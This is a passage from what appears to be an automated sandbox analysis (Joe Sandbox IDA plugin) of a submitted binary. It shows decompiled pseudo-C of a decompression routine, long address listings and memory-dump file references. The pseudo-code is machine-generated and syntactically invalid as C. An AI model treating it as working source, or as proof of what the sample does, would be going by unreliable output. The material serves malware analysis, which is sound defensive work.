								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x004063d8
0x004063d8
0x004063dd
0x00406454
0x0040645b
0x00406465
0x00406a44
0x00406a44
0x00406a47
0x00406a47
0x00406a4d
0x00406a53
0x00406a59
0x00406a73
0x00406a76
0x00406a7c
0x00406a87
0x00406a89
0x00406a5b
0x00406a5b
0x00406a6a
0x00406a6e
0x00406a6e
0x00406a93
0x00406aba
0x00406aba
0x00406ac0
0x00406ac0
0x00000000
0x00406a95
0x00406a95
0x00406a99
0x00406c48
0x00000000
0x00406c48
0x00406aa5
0x00406aac
0x00406ab4
0x00406ab7
0x00000000
0x00406ab7
0x004063df
0x004063df
0x004063e3
0x004063eb
0x004063ee
0x004063f0
0x004063f3
0x004063f5
0x004063fa
0x004063fd
0x00406404
0x0040640b
0x0040640e
0x00406419
0x00406421
0x00406421
0x0040641b
0x0040641b
0x0040641b
0x00406410
0x00406410
0x00406410
0x00406428
0x00406446
0x00406448
0x0040661b
0x0040661b
0x0040661e
0x00406621
0x00406624
0x00406627
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406639
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665a
0x0040665d
0x00406663
0x0040663b
0x0040663b
0x00406643
0x00406648
0x0040664a
0x0040664c
0x0040664c
0x0040666d
0x00406670
0x00406613
0x00406619
0x00000000
0x00000000
0x00000000
0x00406672
0x004065ee
0x004065f2
0x00406bfa
0x00000000
0x00406bfa
0x004065f8
0x004065fb
0x004065fe
0x00406602
0x00406605
0x0040660b
0x0040660d
0x0040660d
0x00406610
0x00000000
0x00406610
0x0040642a
0x0040642a
0x0040642d
0x00406433
0x00406435
0x00406435
0x00406438
0x0040643b
0x0040643d
0x0040643e
0x00406441
0x004064ae
0x004064ae
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064bf
0x004064c2
0x004064c4
0x004064ca
0x004064cd
0x004064d0
0x004064d3
0x004064d6
0x004064dc
0x004064f8
0x004064fb
0x004064fe
0x00406501
0x00406508
0x0040650e
0x00406512
0x004064de
0x004064de
0x004064e2
0x004064ea
0x004064ef
0x004064f1
0x004064f3
0x004064f3
0x0040651c
0x0040651f
0x00406496
0x00406496
0x0040649c
0x0040654f
0x00406555
0x00000000
0x00000000
0x00406557
0x0040655a
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406569
0x0040656c
0x0040656f
0x00406575
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406596
0x00406599
0x0040659f
0x00406577
0x00406577
0x0040657f
0x00406584
0x00406586
0x00406588
0x00406588
0x004065a9
0x004065ac
0x0040652a
0x0040652e
0x00406bee
0x00000000
0x00406bee
0x00406534
0x00406537
0x0040653a
0x0040653e
0x00406541
0x00406547
0x00406549
0x00406549
0x0040654c
0x0040654c
0x004065ac
0x004065b3
0x004065b3
0x004065b3
0x004065b7
0x004065b7
0x004065ba
0x004065bd
0x004065c1
0x00406c06
0x00000000
0x00406c06
0x004065c7
0x004065ca
0x004065cd
0x004065d0
0x004065d3
0x004065d6
0x004065d9
0x004065db
0x004065de
0x004065e1
0x004065e4
0x004065e6
0x004065e6
0x004065e6
0x00406783
0x00406783
0x00406786
0x00406786
0x00000000
0x00406786
0x004064a8
0x00000000
0x00000000
0x00000000
0x00406525
0x00406471
0x00406475
0x00406be2
0x00406c5e
0x00406c66
0x00406c6d
0x00406c6f
0x00406c76
0x00406c7a
0x00406c7a
0x0040647b
0x0040647e
0x00406481
0x00406485
0x00406488
0x0040648e
0x00406490
0x00406490
0x00406493
0x00000000
0x00406493
0x0040651f
0x00406428
0x0040625c
0x0040625c
0x00406265
0x00406c73
0x00406c73
0x00000000
0x00406c73
0x0040626b
0x00000000
0x00406276
0x00000000
0x00000000
0x0040627f
0x00406282
0x00406285
0x00406289
0x00000000
0x00000000
0x0040628f
0x00406292
0x00406294
0x00406295
0x00406298
0x0040629a
0x0040629b
0x0040629d
0x004062a0
0x004062a5
0x004062aa
0x004062b3
0x004062c6
0x004062c9
0x004062d5
0x004062fd
0x004062ff
0x0040630d
0x0040630d
0x00406311
0x00000000
0x00000000
0x00000000
0x00000000
0x00406301
0x00406301
0x00406304
0x00406305
0x00406305
0x00000000
0x00406301
0x004062db
0x004062e0
0x004062e0
0x004062e9
0x004062f1
0x004062f4
0x00000000
0x004062fa
0x004062fa
0x00000000
0x004062fa
0x00000000
0x00406317
0x00406317
0x0040631b
0x00406bc7
0x00000000
0x00406bc7
0x00406324
0x00406334
0x00406337
0x0040633a
0x0040633a
0x0040633a
0x0040633d
0x00406341
0x00000000
0x00000000
0x00406343
0x00406349
0x00406373
0x00406379
0x00406380
0x00000000
0x00406380
0x0040634f
0x00406352
0x00406357
0x00406357
0x00406362
0x0040636a
0x0040636d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063b2
0x004063b8
0x004063bb
0x004063c8
0x004063d0
0x00000000
0x00000000
0x00406387
0x00406387
0x0040638b
0x00406bd6
0x00000000
0x00406bd6
0x00406397
0x004063a2
0x004063a2
0x004063a2
0x004063a5
0x004063a8
0x004063ab
0x004063b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406677
0x0040667b
0x00406699
0x0040669c
0x004066a3
0x004066a6
0x004066a9
0x004066ac
0x004066af
0x004066b2
0x004066b4
0x004066bb
0x004066bc
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066c7
0x004066cc
0x00000000
0x004066cc
0x0040667d
0x00406680
0x00406683
0x0040668d
0x00000000
0x00000000
0x004066e1
0x004066e5
0x00406708
0x0040670b
0x0040670e
0x00406718
0x004066e7
0x004066e7
0x004066ea
0x004066ed
0x004066f0
0x004066fd
0x00406700
0x00406700
0x00000000
0x00000000
0x00406724
0x00406728
0x00000000
0x00000000
0x0040672e
0x00406732
0x00000000
0x00000000
0x00406738
0x0040673a
0x0040673e
0x0040673e
0x00406741
0x00406745
0x00000000
0x00000000
0x00406795
0x00406799
0x004067a0
0x004067a3
0x004067a6
0x004067b0
0x00000000
0x004067b0
0x0040679b
0x00000000
0x00000000
0x004067bc
0x004067c0
0x004067c7
0x004067ca
0x004067cd
0x004067c2
0x004067c2
0x004067c2
0x004067d0
0x004067d3
0x004067d6
0x004067d6
0x004067d9
0x004067dc
0x004067df
0x004067df
0x004067e2
0x004067e9
0x004067ee
0x00000000
0x00000000
0x0040687c
0x0040687c
0x00406880
0x00406c1e
0x00000000
0x00406c1e
0x00406886
0x00406889
0x0040688c
0x00406890
0x00406893
0x00406899
0x0040689b
0x0040689b
0x0040689b
0x0040689e
0x004068a1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x004068ff
0x00406903
0x00406c2a
0x00000000
0x00406c2a
0x00406909
0x0040690c
0x0040690f
0x00406913
0x00406916
0x0040691c
0x0040691e
0x0040691e
0x0040691e
0x00406921
0x00000000
0x00000000
0x004066cf
0x004066cf
0x004066d2
0x00000000
0x00000000
0x00406a0e
0x00406a12
0x00406a34
0x00406a37
0x00406a41
0x00000000
0x00406a41
0x00406a14
0x00406a17
0x00406a1b
0x00406a1e
0x00406a1e
0x00406a21
0x00000000
0x00000000
0x00406acb
0x00406acf
0x00406aed
0x00406aed
0x00406aed
0x00406af4
0x00406afb
0x00406b02
0x00406b02
0x00000000
0x00406b02
0x00406ad1
0x00406ad4
0x00406ad7
0x00406ada
0x00406ae1
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00000000
0x00406bbc
0x00406bbf
0x00000000
0x00000000
0x004067f6
0x004067f8
0x004067ff
0x00406800
0x00406802
0x00406805
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406813
0x00406815
0x00406817
0x00406817
0x00406818
0x0040681b
0x00406822
0x00406825
0x00406833
0x00000000
0x00000000
0x00406b09
0x00406b09
0x00406b0c
0x00406b13
0x00000000
0x00000000
0x00406b18
0x00406b18
0x00406b1c
0x00406c54
0x00000000
0x00406c54
0x00406b22
0x00406b25
0x00406b28
0x00406b2c
0x00406b2f
0x00406b35
0x00406b37
0x00406b37
0x00406b37
0x00406b3a
0x00406b3d
0x00406b3d
0x00406b3d
0x00406b3d
0x00406b40
0x00406b40
0x00406b44
0x00406ba4
0x00406ba7
0x00406bac
0x00406bad
0x00406baf
0x00406bb1
0x00406bb4
0x00000000
0x00406bb4
0x00406b46
0x00406b4c
0x00406b4f
0x00406b52
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b61
0x00406b64
0x00406b67
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8d
0x00406b8f
0x00406b8f
0x00406b90
0x00406b93
0x00406b69
0x00406b69
0x00406b71
0x00406b76
0x00406b78
0x00406b7b
0x00406b7b
0x00406b96
0x00406b9d
0x00000000
0x00406b9f
0x00000000
0x00406b9f
0x00000000
0x0040683b
0x0040683e
0x00406874
0x004069a4
0x004069a4
0x004069a4
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ac
0x00406c36
0x00000000
0x00406c36
0x004069b2
0x004069b5
0x00000000
0x00000000
0x004069bb
0x004069bf
0x004069c2
0x004069c2
0x004069c2
0x00000000
0x004069c2
0x00406840
0x00406842
0x00406844
0x00406846
0x00406849
0x0040684a
0x0040684c
0x0040684e
0x00406851
0x00406854
0x0040686a
0x0040686f
0x004068a7
0x004068a7
0x004068ab
0x004068d7
0x004068d9
0x004068e0
0x004068e3
0x004068e6
0x004068e6
0x004068eb
0x004068eb
0x004068ed
0x004068f0
0x004068f7
0x004068fa
0x00406927
0x00406927
0x0040692a
0x0040692d
0x004069a1
0x004069a1
0x004069a1
0x00000000
0x004069a1
0x0040692f
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x0040694d
0x00406950
0x00406969
0x0040696b
0x0040696e
0x0040696f
0x00406972
0x00406974
0x00406977
0x00406979
0x0040697b
0x0040697e
0x00406980
0x00406983
0x00406987
0x00406989
0x00406989
0x0040698a
0x0040698d
0x00406990
0x00406952
0x00406952
0x0040695a
0x0040695f
0x00406961
0x00406964
0x00406964
0x00406993
0x0040699a
0x00406924
0x00406924
0x00406924
0x00406924
0x00000000
0x0040699c
0x00000000
0x0040699c
0x0040699a
0x004068ad
0x004068b0
0x004068b2
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068c0
0x004068c3
0x004068c3
0x004068c6
0x004068c6
0x004068c9
0x004068d0
0x004068a4
0x004068a4
0x004068a4
0x004068a4
0x00000000
0x004068d2
0x00000000
0x004068d2
0x004068d0
0x00406856
0x00406859
0x0040685b
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406c12
0x00000000
0x00406c12
0x00406752
0x00406755
0x00406758
0x0040675b
0x0040675d
0x0040675d
0x0040675d
0x00406760
0x00406763
0x00406766
0x00406769
0x0040676c
0x0040676f
0x00406770
0x00406772
0x00406772
0x00406772
0x00406775
0x00406778
0x0040677b
0x0040677e
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x004069c5
0x004069c5
0x004069c5
0x004069c9
0x00000000
0x00000000
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069da
0x004069da
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069ec
0x004069ed
0x004069ef
0x004069ef
0x004069ef
0x004069f2
0x004069f5
0x004069f8
0x004069fb
0x004069fe
0x00406a02
0x00406a04
0x00406a07
0x00000000
0x00406a09
0x00000000
0x00406a09
0x00406a07
0x00406c3c
0x00000000
0x00000000
0x0040626b

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
